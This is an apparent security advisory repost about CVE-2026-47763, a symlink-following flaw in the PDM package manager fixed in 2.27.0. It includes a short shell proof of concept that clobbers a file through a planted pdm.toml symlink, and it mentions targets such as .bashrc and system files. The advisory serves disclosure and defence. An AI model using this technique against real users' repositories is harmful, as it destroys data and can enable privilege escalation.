Listen to this Post
This vulnerability, identified as CVE-2026-47763, affects the Python package manager PDM. It allows an attacker to perform arbitrary file clobbering (overwriting) by exploiting how PDM handles project-local configuration files. When a user initializes a PDM project in a repository that has been maliciously prepared, any configuration command that writes to a file can be manipulated.
The core issue is that PDM writes several project-local state or configuration files, such as pdm.toml, .pdm-python, and .python-version, without any symlink protection. If an attacker places a symlink with the same name as one of these files in the repository, PDM will write to the target of that symlink instead of the intended file within the project directory. This creates an “arbitrary file clobber” primitive, meaning the user, with their own privileges, can inadvertently overwrite any file on the system that the symlink points to. The risk is particularly high when `pdm` is run with elevated privileges (like with sudo), as this could lead to overwriting critical system files and potential privilege escalation.
For the most stable sink, pdm.toml, the target file must already contain valid TOML data for the write operation to succeed. However, this constraint does not apply to the other vulnerable files like `.pdm-python` or .python-version. The vulnerability requires user interaction; the victim must actively run a command that writes project-local configuration or state, such as pdm config --local .... This issue was fixed in PDM version 2.27.0, which introduced checks to prevent writing to symlinks.
DailyCVE Form:
Platform: pdm package manager
Version: 2.26.9 affected
Vulnerability: Symlink arbitrary write
Severity: 6.8 (Medium)
Date: 2026-05-21
Prediction: Already patched 2.27.0
What Undercode Say:
This PoC demonstrates the vulnerability by creating a symlink named `pdm.toml` pointing to a target file outside the project root. When `pdm config --local` is run, it writes to the target file instead of the symlink itself. Ensure you have a vulnerable version of pdm installed (e.g., 2.26.9). Create a new directory for the PoC and navigate into it. mkdir -p ~/poc-symlink && cd ~/poc-symlink Create a target file that will be clobbered. For the main sink <code>pdm.toml</code>, the target must already contain valid TOML data. Create a temporary target file anywhere on the system. target="/tmp/clobbered-target.toml" cat > "$target" <<'EOF' [bash] value = 1 EOF Create a symlink named `pdm.toml` in the project directory pointing to the target file. ln -s "$target" pdm.toml Create a minimal `pyproject.toml` to initialize the PDM project. cat > pyproject.toml <<'EOF' [bash] name = "symlink-clobber-demo" version = "0.0.1" EOF Run a PDM command that writes to the project-local config. This command modifies the `venv.in_project` setting. pdm config -l venv.in_project false Now, check the target file. It will have been modified with the new config. echo " target file contents " cat "$target" echo " end " This shows that the config was written to the target of the symlink, not to a local <code>pdm.toml</code>.
Exploit:
The exploit requires the victim to clone a malicious repository and run a PDM command that writes to a project-local configuration file. The attacker prepares the repository by creating a symlink (e.g., pdm.toml) that points to a target file of the attacker’s choosing, such as a system-level configuration file or a user’s .bashrc. When the victim runs a command like pdm config --local venv.in_project false, PDM follows the symlink and clobbers the target file, potentially causing data loss, denial of service, or privilege escalation if the target is a sensitive file.
Protection:
Upgrade: Immediately upgrade to PDM version `2.27.0` or later, which includes a fix that refuses to write to project-local files if they are symlinks.
Symlink checks: Implement checks in code to validate that important configuration files are not symlinks before writing to them.
Secure configuration: Avoid writing to configuration files without using safe, atomic file operations that prevent symlink following.
Impact:
Arbitrary file clobbering: An attacker can overwrite any file that the victim user has write permissions for, potentially breaking the system or application functionality.
Privilege escalation: If PDM is run with elevated privileges (e.g., sudo), an attacker could clobber critical system files, leading to a complete system compromise or denial of service.
Data integrity loss: The vulnerability allows destructive modification of files outside the repository root, impacting data integrity and potentially causing data loss.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
